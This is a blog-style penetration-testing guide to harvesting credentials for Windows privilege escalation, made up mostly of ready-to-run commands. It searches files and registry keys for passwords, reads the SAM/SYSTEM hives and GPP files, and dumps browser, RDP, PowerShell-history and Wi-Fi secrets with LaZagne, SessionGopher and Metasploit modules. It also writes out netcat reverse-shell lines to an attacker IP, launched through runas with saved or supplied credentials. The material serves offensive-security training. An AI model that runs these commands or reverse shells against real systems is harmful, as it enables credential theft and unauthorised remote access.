Guides, Privilege Escalation, Windows

Windows Privilege Escalation – Credentials Harvesting

January 27, 2021 | by Stefano Lanaro | Leave a comment

Introduction

Windows systems and applications often store clear text, encoded or hashed credentials in files, registry keys or in memory.

When gaining initial access to a Windows machine and performing privilege escalation enumeration steps, often passwords can be found through these means and they can be used to further escalate privileges.

There are various methods to harvest credentials in a Windows system in order to escalate privileges, the following ones are the most common and they are always worth a try.

Finding passwords in files

One of the first things to do is to search for files containing the “password” string as this could help in identifying hidden credentials:

  • findstr /si password *.xml *.ini *.txt *.config 2>nul
  • cd C:\ & findstr /SI /M “password” *.xml *.ini *.txt
  • findstr /spin “password” *.*
  • Check .config or other interesting file types for those strings
  • dir /s *pass* == *cred* == *vnc* == *.config*
  • dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
  • where /R C:\ user.txt
  • where /R C:\ *.ini

You can also use other common keywords such as passwd, secret etc.

Unattended Installation

Older versions of windows, when performing unattended installations, used text files to store answers to questions that come up during the installation process, some of which contained clear text credentials:

  • c:\sysprep.inf
  • c:\sysprep\sysprep.xml
  • c:\unattend.xml
  • %WINDIR%\Panther\Unattend\Unattended.xml
  • %WINDIR%\Panther\Unattended.xml
  • dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Additionally, the Windows.old directory may contain sensitive files, such as registry hives, that could be storing passwords

VNC Credentials

VNC is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol to remotely control another computer. This protocol often stored clear-text user credentials in text files:

  • dir c:\*vnc.ini /s /b
  • dir c:\*ultravnc.ini /s /b
  • dir c:\ /s /b | findstr /si *vnc.ini

Credentials Stored in the Registry

The Windows registry often stores clear-text or encoded passwords used by various applications. Below are a few examples:

  • reg query “HKLM\SYSTEM\Current\ControlSet\Services\SNMP”
  • reg query “HKCU\Software\ORL\WinVNC3\Password”
  • reg query “HKCU\Software\TightVNC\Server”
  • reg query “HKCU\Software\OpenSSH\Agent\Key”
  • reg query “HKCU\Software\SimonTatham\PuTTY\Sessions”
  • reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”
  • reg query HKLM /f password /t REG_SZ /s
  • reg query HKCU /f password /t REG_SZ /s

Check for SAM and SYSTEM files access

The Security Account Manager application is used to securely store users’ encrypted passwords using encryption. They are stored in a registry hive as a LM or NTLM hash. They can be stored in the following keys:

  • %SYSTEMROOT%\repair\SAM
  • %SYSTEMROOT%\System32\config\RegBack\SAM
  • %SYSTEMROOT%\System32\config\SAM
  • %SYSTEMROOT%\repair\system
  • %SYSTEMROOT%\System32\config\SYSTEM
  • %SYSTEMROOT%\System32\config\RegBack\system

Common Web Configuration Files

Web applications might store clear-text or encoded credentials in text files. The Inetpub folder is the default folder for Microsoft IIS and if present, it is likely to contain confidentials information. Some example commands are:

  • dir /a C:\inetpub\
  • dir /s web.config
  • C:\Windows\System32\inetsrv\config\applicationHost.config
  • Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
  • dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf

Web Logs

Apache, Tomcat and IIS have logs that are used to store user access to a web application and any errors that may have occurred in the web application.

These are usually store in these locations:

  • dir /s access.log error.log
  • C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
  • C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
  • C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
  • C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log

Cached & Saved Credentials

Windows often uses applications such as the Windows Vault to store login credentials for servers and sites.

Cmdkey is a command used to create/list/delete stored user names, passwords or credentials. The below can be used to list saved credentials:

  • cmdkey /list

Once verifying that credentials are stored in the system, the runas command can be used with the /savecred flag to execute commands as another user using the saved credentials:

  • runas /savecred /user:WORKGROUP\Administrator “\\10.10.10.10\SHARE\evil.exe”

runas can also be used by providing user credentials:

• C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> “c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe”

or

• $ secpasswd = ConvertTo-SecureString “<password>” -AsPlainText -Force
• $ mycreds = New-Object System.Management.Automation.PSCredential (“<user>”, $secpasswd)
• $ computer = “<hostname>” [System.Diagnostics.Process]::Start(“C:\users\public\nc.exe”,”<attacker_ip> 4444 -e cmd.exe”, $mycreds.Username, $mycreds.Password, $computer)

Windows Credential Store

The Windows Credential Store is a feature of Windows that saves usernames, passwords, and certificates for systems, websites, and servers.
information is stored.

The Credential Manager stores two types of credentials: Web and Windows. There are two PowerShell scripts that can help harvest this data:Gathering

Web Credentials:

Windows Credentials

Group Policy Preferences (GPP Passwords)

If the box is part of a domain and the current user user has access to read System Volume Information, this can help find passwords stored in files.

Start by checking the environment variables for the IP-address of the domain controller. Output environment-variables with the following:

  • LOGONSERVER=\\NAMEOFSERVER
  • USERDNSDOMAIN=WHATEVER.LOCAL

Then look up the IP-address

  • nslookup nameofserver.whatever.local

Mount the volume and search for the groups.xml file

  • net use z: \\192.168.1.101\SYSVOL
  • z:
  • dir Groups.xml /s

Otherwise, these can be found in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history, by looking for:

  • Groups.xml
  • Services.xml
  • Scheduledtasks.xml
  • DataSources.xml
  • Printers.xml
  • Drives.xml

The next step is decrypt the passowrds using the gpp-decrypt tool.
You can also do this with PowerView and the Get-GPPPpassword script.

Using Powershell to load them into memory:

Then run the Get-GPPPassword tool and feed any listed passwords to PowerView. This will check any found credentials against other machines.

  • Get-NetOU -GUID “{4C86DD57-4040-41CD-B163-58F208A26623}” | %{ Get-NetComputer -ADSPath $_ }

Visit https://www.toshellandback.com/2015/08/30/gpp/ for more info.

Services and Applications Storing Credentials

Applications that are used to access systems or services remotely such as Remmina/PuTTY, RDP, Filezilla etc often store passwords in memory or in files. These can be retrieved using SessionGopher:

  • https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
  • Import-Module path\to\SessionGopher.ps1;
  • Invoke-SessionGopher -AllDomain -o
  • Invoke-SessionGopher -AllDomain -u domain.com\stef -p password

Lazagne can also be used to exctract credentials from many applications.

Credentials Stored in Browsers

Browsers such as Google Chrome, Firefox, Microsoft Edge etc. can often store passwords when authentication to a website is performed. Lazagne is an open source application used to retrieve passwords stored on a local computer, and one of its many functions is to retrieve passwords stored in internet browsers.

CommandDescription
laZagne.exe allLaunch all modules
laZagne.exe browsersLaunch only a specific module
laZagne.exe browsers -firefoxLaunch a specific software script
laZagne.exe -h
laZagne.exe browsers -h		Get help
laZagne.exe all -vvChange verbosity mode (2 different levels)

Additionally, the following Metasploit modules can also be used:

  • use post/window/gather/enum_chrome
  • use post/window/gather/enum_firefox
  • use post/window/gather/enum_ie

Saved RDP Connections

RDP has the ability to save connection information (such as passwords) in the registry. They can be found at the following registry keys:

  • HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\
  • HKCU\Software\Microsoft\Terminal Server Client\Servers\

Powershell Command History

Commands executed using powershell are stored in a history file (similar to the .bash_history file in linux), if clear-text credentials were entered when issuing a command, this could be exploited by accessing the history file:

  • type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
  • cat (Get-PSReadlineOption).HistorySavePath
  • cat (Get-PSReadlineOption).HistorySavePath | sls passw

Wi-Fi Credentials

CommandDescription
netsh wlan show profileList available AP SSID
netsh wlan show profile <SSID> key=clearGet the clear-text password use
cls & echo. & for /f “tokens=4 delims=: ” %a in (‘netsh wlan show profiles ^| find “Profile “‘) do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr “SSID Cipher Content” | find /v “Number” & echo.) & @echo onOneliner method to extract wifi passwords from all the access point.

Additional Metasploit Modules

There are certain Metasploit modules that aim at to find clear-text or encoded credentials in a target system:

  • use post/windows/gather/credentials/gpp
  • use post/windows/gather/credential_collector
  • use post/window/gather/enum_chrome
  • use post/window/gather/enum_firefox
  • use post/window/gather/enum_ie
  • use post/multi/gather/filezilla_client_cred
  • use post/multi/gather/firefox_creds
  • use post/multi/gather/irssi_creds
  • use post/multi/gather/lastpass_creds
  • use post/multi/gather/maven_creds
  • use post/multi/gather/netrc_creds
  • use post/multi/gather/pidgin_cred
  • use post/multi/gather/rsyncd_creds
  • use post/multi/gather/ssh_creds
  • use post/multi/gather/thunderbird_creds

Conclusion

Exposed passwords are a very common method of intrusion and privilege escalation, and although it’s not as common nowadays since most applications use encryption, it’s something that should not be overlooked.

Automated enumeration scripts will also perform credential harvesting although it’s always best to do this manually.